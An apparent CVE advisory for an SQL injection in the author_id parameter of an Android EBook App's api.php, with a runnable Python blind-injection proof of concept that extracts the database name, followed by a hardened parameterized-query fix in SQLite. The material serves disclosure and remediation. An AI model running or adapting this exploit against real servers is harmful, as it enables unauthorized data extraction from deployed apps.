CVE-2021-32428

SQL Injection vulnerability in viaviwebtech Android EBook App (Books App, PDF, ePub, Online Book Reading, Download Books) 10 via the author_id parameter to api.php.


[+] Title: Android EBook App (Books App, PDF, ePub, Online Book Reading, Download Books)
[+] Author: veyselxan
[+] Vendor Homepage: https://codecanyon.net/user/viaviwebtech
[+] Tested on: Windows 10
[+] Versions: 10
[+] Vulnerability Type: SQL injection
[+] Vulnerable Parameter: "author_id"
[+] Vulnerable File: api.php
[+] CVE: CVE-2021-32428

SQL Injection vulnerability in viaviwebtech Android EBook App (Books App, PDF, ePub, Online Book Reading, Download Books) 10 via the author_id parameter to api.php.

# PoC:

#!/usr/bin/python3
import requests
import sys
import string

url = sys.argv[1]+"api.php"
listler = list()

def exploit(xa,i):
    database = {'data': '{"package_name" : "com.example.test","salt":"123456","sign":"7cbf2e8809bf2f671470469ec252acea","method_name":"get_author_details","author_id":"1\' AND substring(database(),'+str(i)+',1)=\''+str(xa)+'\'-- veyselxan"}'}
    x = requests.post(url, data = database)
    a = x.json()
    if a['status']==1:
        listler.append(xa)

i = 1
yazilara = list(string.ascii_lowercase)
while i < 16:
    for x in yazilara:
        exploit(x,i)
    i += 1
print(*listler, sep = "")
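
The fix class for this bug, as an added example (not the vendor's code and not part of the advisory): parse the JSON carried in the `data` field, accept `author_id` only as a positive integer, and bind it as a query parameter. SQLite stands in for the app's database; the table name, column names and the `reason` field are assumptions, while `status` mirrors the field the PoC checks.

```python
import json
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the app's database (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tbl_author (author_id INTEGER PRIMARY KEY, author_name TEXT)")
    conn.execute("INSERT INTO tbl_author VALUES (1, 'Sample Author')")
    return conn

def parse_author_id(data_field):
    """Return author_id as a positive int, or None if the request is malformed."""
    try:
        body = json.loads(data_field)
    except (TypeError, ValueError):
        return None
    raw = body.get("author_id") if isinstance(body, dict) else None
    if isinstance(raw, int) and not isinstance(raw, bool):
        return raw if raw > 0 else None
    if isinstance(raw, str) and raw.isascii() and raw.isdigit() and len(raw) <= 10:
        return int(raw) or None  # "0" and "000" are rejected as well
    return None

QUERY = "SELECT author_name FROM tbl_author WHERE author_id = ?"

def get_author_details(conn, data_field):
    """Hardened handler: strict type check first, then a bound parameter."""
    author_id = parse_author_id(data_field)
    if author_id is None:
        return {"status": 0, "reason": "invalid author_id"}
    row = conn.execute(QUERY, (author_id,)).fetchone()
    if row is None:
        return {"status": 0, "reason": "not found"}
    return {"status": 1, "author_name": row[0]}

def lookup_unvalidated(conn, raw_value):
    """Binding alone: the value is compared as data and never parsed as SQL."""
    return conn.execute(QUERY, (raw_value,)).fetchone()

# Constructed sample requests; BAD_ID has the shape of the value the PoC sends.
BAD_ID = "1' AND substring(database(),1,1)='a'-- x"
GOOD = json.dumps({"method_name": "get_author_details", "author_id": "1"})
BAD = json.dumps({"method_name": "get_author_details", "author_id": BAD_ID})

if __name__ == "__main__":
    db = make_db()
    print(get_author_details(db, GOOD))
    print(get_author_details(db, BAD))
    print(lookup_unvalidated(db, BAD_ID))
```

With both layers in place the response no longer varies with the injected condition, which is the signal the boolean-based extraction depends on.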
